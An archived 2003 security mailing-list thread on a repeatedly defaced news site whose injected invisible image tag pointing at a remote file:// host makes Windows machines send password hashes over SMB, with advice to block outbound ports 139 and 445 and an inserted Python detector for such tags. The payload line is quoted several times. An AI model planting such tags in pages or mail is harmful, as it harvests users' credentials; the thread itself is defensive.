RE: Importance of outbound traffic filtering

From: Stark, Vernon L. (Vern.Starkat_private)
Date: Tue Jul 22 2003 - 09:54:03 PDT


A host that encounters content such as <img
src=file://korean_ip_address/test.jpg height=0 width=0> simply tries to
contact the single host korean_ip_address. It does not try to do a DDOS.  If
ports 139 and 445 are not blocked outbound, the impact is that the host will
create a connection with the Korean host and attempt to authenticate.  This
authentication includes providing password hashes to the remote host.

What we've seen is a news site that repeatedly gets defaced.  The
defacement consists of simply adding the content listed above.  When users
are browsing the web and encounter this news site, their hosts attempt to
call Korea.  The packets all have the same destination IP address (the
Korean host) and their only intent is to establish a connection with the
Korean host.  There is no intent to do a DOS.  So, blocking outbound TCP 139
and 445 keeps your password hashes from being transmitted to Korea where
they might be cracked and used for gaining access to your network.  The
content simply provides a way to harvest password hashes.

By the way, I've also seen this content in an e-mail message.  Yes,
when the user opened the e-mail, his host started attempting to contact the
IP address listed in the offending content.

Vern
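The harvesting mechanism Vern describes can also be caught on the content side, before a browser ever opens the SMB session. The following is an added example, not code from the thread or any of its posters: it scans fetched HTML for <img> tags whose src is a file:// URL or a UNC path naming a remote host, the shape of the defacement quoted in the thread. SAMPLE_HTML is constructed input; "korean_ip_address" is kept as the thread's own placeholder and 203.0.113.7 / 192.0.2.55 are documentation addresses.

```python
import re
from urllib.parse import urlsplit

# Constructed sample page (not the defaced site): the invisible <img> whose
# src names a remote host, as described in the thread, beside harmless images.
SAMPLE_HTML = """
<html><body>
<h1>Daily news</h1>
<img src="/static/logo.png" width=120 height=40>
<img src=file://korean_ip_address/test.jpg height=0 width=0>
<img src="file://203.0.113.7/share/pixel.gif" height="0" width="0">
<img src="file:///C:/Users/me/local.jpg">
<img src='\\\\192.0.2.55\\pics\\x.jpg' width=0 height=0>
</body></html>
"""

IMG_TAG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)
# src value may be double-quoted, single-quoted, or bare (as in the defacement)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""",
                      re.IGNORECASE)

def remote_file_host(src):
    """Return the host an image source would make Windows open an SMB
    session to (file://host/... or \\\\host\\...), or None if the source
    is local or an ordinary http(s) URL."""
    src = src.strip()
    if src.startswith("\\\\"):                 # UNC path \\host\share\file
        host = src[2:].split("\\", 1)[0]
    elif src.lower().startswith("file:"):
        host = urlsplit(src).hostname or ""  # file:///C:/... has no host
    else:
        return None
    return None if host in ("", "localhost") else host

def find_hash_leak_images(html):
    """Return (host, tag) for every <img> whose source points at a remote
    file share; any hit is a reason to treat the page as tampered with."""
    findings = []
    for match in IMG_TAG.finditer(html):
        tag = match.group(0)
        attr = SRC_ATTR.search(tag)
        if not attr:
            continue
        src = next(g for g in attr.groups() if g is not None)
        host = remote_file_host(src)
        if host:
            findings.append((host, tag))
    return findings
```

Run it over pages mirrored from sites your users visit, or over the HTML of inbound mail, and pair it with the outbound 139/445 block so a hit in the log and a hit in the content corroborate each other.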
    
-----Original Message-----
From: Jack Lyons [mailto:jack.lyonsat_private]
Sent: Tuesday, July 22, 2003 12:39 PM
To: 'Stark, Vernon L.'; 'incidentsat_private'
Subject: RE: Importance of outbound traffic filtering


I block those ports and others outbound, but it would only stop a DDOS attack
against people who left those ports open inbound - correct?
    
> -----Original Message-----
> From: Stark, Vernon L. [mailto:Vern.Starkat_private]
> Sent: Friday, July 18, 2003 10:13 AM
> To: 'incidentsat_private'
> Subject: Importance of outbound traffic filtering
> 
> For the third time since May 5th, a site which provides news about
> Department of Defense issues has apparently been defaced.  The hack is
> described in Ed Skoudis's excellent book entitled "Counter Hack" (pages
> 289-290).  The hack we noticed today is a web page with content of the
> form
> 
> <img src=file://korean_ip_address/test.jpg height=0 width=0>
> 
> If outbound traffic to TCP ports 139 and 445 is NOT blocked, Windows
> hosts will attempt to send password hashes to the remote host.  Hosts may
> attempt to contact the remote host on other ports (e.g. 80) as well.  This
> clearly illustrates the importance of outbound traffic filtering.
> 
> Vern Stark, GCIA, GSEC
> 
> JHU/APL
> 
    
    
    



This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 13:37:01 PDT